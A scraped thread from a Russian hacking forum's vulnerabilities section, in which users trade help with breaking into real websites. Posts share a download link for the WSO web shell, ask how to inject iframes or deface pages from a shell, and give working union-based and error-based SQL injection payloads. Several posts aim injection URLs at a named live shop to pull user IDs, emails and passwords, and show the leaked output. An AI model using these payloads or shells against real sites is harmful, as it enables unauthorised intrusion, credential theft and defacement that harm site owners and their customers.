Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    а что именно вам надо то?
     
  2. AGIMI777

    AGIMI777 Banned

    Joined:
    1 Jul 2010
    Messages:
    98
    Likes Received:
    1
    Reputations:
    0
    как я панимаю седес мой шел не работает или мне сервер запретил шел include сделать
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    бешермэ..жигирмэ..шелланама не работает..шайтанама..тута форума дамахазяйканама...
     
    2 people like this.
  4. AGIMI777

    AGIMI777 Banned

    Joined:
    1 Jul 2010
    Messages:
    98
    Likes Received:
    1
    Reputations:
    0
    братва на античате все силки на скачивание закрити дайте url для скачивание шел
     
  5. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    http://narod.ru/disk/18331224000/wso2.4.zip.html
     
    2 people like this.
  6. AGIMI777

    AGIMI777 Banned

    Joined:
    1 Jul 2010
    Messages:
    98
    Likes Received:
    1
    Reputations:
    0
  7. tompson_

    tompson_ New Member

    Joined:
    1 Jul 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    может сразу рутшелл дать? я конкретно сформулировал вопрос. те, кто знают, ответят
     
  8. _iks_

    _iks_ Member

    Joined:
    21 Feb 2009
    Messages:
    60
    Likes Received:
    59
    Reputations:
    61
    Через ошибку выводи.
     
    1 person likes this.
  9. tompson_

    tompson_ New Member

    Joined:
    1 Jul 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    это мне? если да, можно конкретнее?
     
  10. _iks_

    _iks_ Member

    Joined:
    21 Feb 2009
    Messages:
    60
    Likes Received:
    59
    Reputations:
    61
    Вот пример, читай то что пониже https://forum.antichat.ru/thread119047.html

    Потом гугли другие способы, если этот не прокатит.
     
  11. M.MIB

    M.MIB New Member

    Joined:
    2 Aug 2010
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    Подскажите как на шелле с ограниченными правами можно вставить iframe ?
     
  12. tompson_

    tompson_ New Member

    Joined:
    1 Jul 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    я читал эту и другие статьи по инъекциям несколько раз. если бы я знал ответ, то не спрашивал. ты можешь предложить что-то конкретное? гуглить не подходит
     
  13. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195

    Не груби, тут тебе никто ничем не обязан.

    Как я понял, проблема в том, что параметр id обрамлен кавычками и тебе не составить верный запрос.

    Крути так:

    HTML:
    -99999'+union+select+1,2,3+and+'1'='1
    
    HTML:
    -99999'+union+select+1,version(),3+and+'1'='1
    
    HTML:
    -999999'+union+select+1,((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1)),3+and+'1'='1
    
    И так далее

    Либо отсеки ненужное комментарием -- -

    HTML:
    -999999'+union+select+1,((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1)),3-- -
    
    UPDATE:



    Вот тебе через ошибку

    HTML:
    -9999'+or+1+group+by+concat((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1),floor(rand(0)*2))+having+avg(0)+and+'1'='1
    
    и аналогично с -- -

    HTML:
    -9999'+or+1+group+by+concat((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1),floor(rand(0)*2))+having+avg(0)-- -
    
     
    #14373 h00lyshit!, 5 Aug 2010
    Last edited: 24 Mar 2011
    3 people like this.
  14. tompson_

    tompson_ New Member

    Joined:
    1 Jul 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Redwood,
    я в курсе, что мне тут никто ничем не обязан и я не грублю. сам посуди, ответы
    или
    можно было просто не писать.

    по твоему ответу,
    я написал, что в скрипте следующий запрос - UPDATE, который выплевывает ошибку.

    а за
    HTML:
    -9999'+or+1+group+by+concat((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1),floor(rand(0)*2))+having+avg(0)+and+'1'='1
    
    спасибо ;)
     
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    все зависит от шелла, инклюды, через базу и тд и тп
     
  16. happygirl

    happygirl New Member

    Joined:
    10 Jul 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    http://www.eluxbag.com/product.php?page=1&ordertype=3&keyword=&type=products&Categories=&perpagenum=32&id=434%20or%20(1,23)=(select+1+from+(select+count(0),concat((select+concat(ID,Email)+from+userinfo+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--
    -->
    Duplicate entry '[email protected]' for key 1

    but this is not working!
    http://www.eluxbag.com/product.php?page=1&ordertype=3&keyword=&type=products&Categories=&perpagenum=32&id=434 or (1,23)=(select+1+from+(select+count(0),concat((select+concat(Password)+from+userinfo+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--
     
  17. M.MIB

    M.MIB New Member

    Joined:
    2 Aug 2010
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    Можеш объяснить подробнее или дать линк на какой нить ман, шелл wso, safe mode off, нехватает прав править морду.
     
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    да мануала как такогог нет, есть выдумка и способы обхода хитростей админа..стандартного нет ничего..все по разномy
     
    1 person likes this.
  19. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    You can use substring function to solve this problem
    Code:
    http://www.eluxbag.com/product.php?page=1&ordertype=3&keyword=&type=products&Categories=&perpagenum=32&id=434 or (1,23)=(select+1+from+(select+count( 0),concat((select+concat(ID,0x3a,substring(password,1,32))+from+userinfo+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--
     
    1 person likes this.
  20. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    13
    Reputations:
    0
    там берется path из url-а, в котором браузер заменяет пробелы на %20, соответственно эти %20 попадают в запрос. Пробовал передать вручную Path без пробелом - нгинкс возвращает ошибку bad request. так что видимо не получится ничего сделать :( как оказалось, сайт делала одна "студия", которая уже сделала довольно много сайтов (в портфолио около 100), и на всех то самое... обидно)
     
Thread Status:
Not open for further replies.